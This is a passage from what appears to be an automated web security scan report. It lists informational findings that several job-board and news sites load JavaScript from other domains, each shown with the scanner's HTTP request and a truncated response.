<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.312. http://www.counselingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.counselingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.counselingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=lgk9crdg1goruniholj5urn963; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149300

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.313. http://www.cpluspluscrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cpluspluscrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.cpluspluscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:52 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=j0ddtd9qvkbq5g8p17jjmqsi44; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114789

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.314. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://links.mkt1259.com/ui/library/formValidate.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
https://ssl.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Length: 82676
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=3340
Expires: Fri, 21 Jan 2011 23:20:37 GMT
Date: Fri, 21 Jan 2011 22:24:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<ti
...[SNIP]...
</script>

   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=csmtechstaff"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div id="address-46e479181328b9680cd9504cbc04d4e9-7f08a1128cc5eec7cda1269c9df3d3a6">
   <script src="http://links.mkt1259.com/ui/library/formValidate.js" language="javascript"></script>
...[SNIP]...
</script>
       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script >
...[SNIP]...

15.315. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://links.mkt1259.com/ui/library/formValidate.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
https://ssl.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Length: 75123
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=3361
Expires: Fri, 21 Jan 2011 23:21:02 GMT
Date: Fri, 21 Jan 2011 22:25:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<ti
...[SNIP]...
</script>

   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=csmtechstaff"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div id="address-42b3a3dc8b20e53b7dfd5e59781b5d9d-f53ee286f2ef896a280e8ffd35a62def">
   <script src="http://links.mkt1259.com/ui/library/formValidate.js" language="javascript"></script>
...[SNIP]...
</script>
       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script >
...[SNIP]...

15.316. http://www.customerservicecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.customerservicecrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.customerservicecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e126ahin8nno4266rg114hr8q7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.317. http://www.dbacrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dbacrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.dbacrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ks0hq7i64reib4jv7s3j12ces0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125721

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.318. http://www.dentalcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dentalcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.dentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=od1eunkj1a6cadocmt8bfbgt55; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111827

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.319. http://www.designingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.designingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.designingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:17 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3h4obslpuiqaf86r78fndl2ip2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122676

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.320. http://www.directstartv.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.directstartv.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://assets.percentmobile.com/percent_mobile.js
http://d.yimg.com/mi/ywa.js
http://edge.quantserve.com/quant.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:40:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=hj0vosufv45apdqnbbc9nqnia2; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Fri, 20-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=148176080; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=160462422; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Tue, 22-Mar-2011 18:40:28 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

   <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
       </script>
...[SNIP]...

   <script src="http://assets.percentmobile.com/percent_mobile.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

15.321. http://www.diversitycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diversitycrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.diversitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:25 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=oh70k7g7bb01l9sdpsaq85rgq4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:25 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135908

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
